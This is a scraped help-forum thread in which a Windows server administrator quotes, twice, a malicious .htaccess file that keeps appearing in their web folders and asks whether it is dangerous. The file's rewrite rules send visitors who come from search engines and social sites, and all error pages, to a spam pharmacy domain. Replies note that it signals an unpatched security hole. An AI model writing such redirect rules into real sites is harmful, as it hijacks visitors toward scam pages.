Security Risk ? htaccess file appearing in my website folders
This file ".htaccess" is being placed on my server (Win 2008 R2)
in a number of folders where I have my websites,
including the "wwwroot" folder.
Here is the contents of this file :
Options -Indexes
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*youtube.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*qq.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*blog.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://onlinemedsmedicine.ru/ [R,L]
ErrorDocument 401 http://onlinemedsmedicine.ru/
ErrorDocument 403 http://onlinemedsmedicine.ru/
ErrorDocument 404 http://onlinemedsmedicine.ru/
ErrorDocument 500 http://onlinemedsmedicine.ru/
I have to log into the server every few days and delete them.
Are these files dangerous?
How are they putting these files there?
Anyway of stopping this?
Thanks
in a number of folders where I have my websites,
including the "wwwroot" folder.
Here is the contents of this file :
Options -Indexes
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*youtube.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*qq.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*blog.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://onlinemedsmedicine.ru/ [R,L]
ErrorDocument 401 http://onlinemedsmedicine.ru/
ErrorDocument 403 http://onlinemedsmedicine.ru/
ErrorDocument 404 http://onlinemedsmedicine.ru/
ErrorDocument 500 http://onlinemedsmedicine.ru/
I have to log into the server every few days and delete them.
Are these files dangerous?
How are they putting these files there?
Anyway of stopping this?
Thanks
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
thanks guys . . I read this :
"For sites hosted on Apache one of the most common ways this type of hack is accomplished is a hack of an Apache file named .htaccess."
If the .htaccess file is for Apache and I'm using IIS, would the attack even work at all?
"For sites hosted on Apache one of the most common ways this type of hack is accomplished is a hack of an Apache file named .htaccess."
If the .htaccess file is for Apache and I'm using IIS, would the attack even work at all?
There is an addin for IIS that uses '.htaccess' but otherwise, I don't think so. Still, the fact that it reappears means that you have a security hole.
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
thanks guys . .
I deleted the contents of the .htaccess file and set it to Read Only.
That seems to have prevented the file from being updated.
I deleted the contents of the .htaccess file and set it to Read Only.
That seems to have prevented the file from being updated.
http://blog.unmaskparasites.com/2008/12/08/unmasking-the-antivirus-2009-htaccess-exploit/